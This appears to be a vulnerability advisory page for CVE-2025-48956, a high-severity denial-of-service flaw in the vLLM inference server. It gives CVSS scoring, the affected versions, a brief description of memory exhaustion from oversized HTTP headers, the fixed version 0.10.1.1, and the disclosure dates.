CVE-2025-48956 HIGH

CVE-2025-48956: vLLM API endpoints vulnerable to Denial of Service Attacks

Vendor Vllm-Project
Product vllm
Weakness CWE-400
Published August 21, 2025
Last update August 21, 2025

CVSS base score

7.5/10
Attack vector Network
Attack complexity Low
Privileges required None
User interaction None
Confidentiality None
Integrity None

CVSS vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

What the vulnerability does

01Description

vLLM is an inference and serving engine for large language models (LLMs). From 0.1.0 to before 0.10.1.1, a Denial of Service (DoS) vulnerability can be triggered by sending a single HTTP GET request with an extremely large header to an HTTP endpoint. This results in server memory exhaustion, potentially leading to a crash or unresponsiveness. The attack does not require authentication, making it exploitable by any remote user. This vulnerability is fixed in 0.10.1.1.

Key dates

02Disclosure timeline

August 21, 2025 CVE published
August 21, 2025 Record updated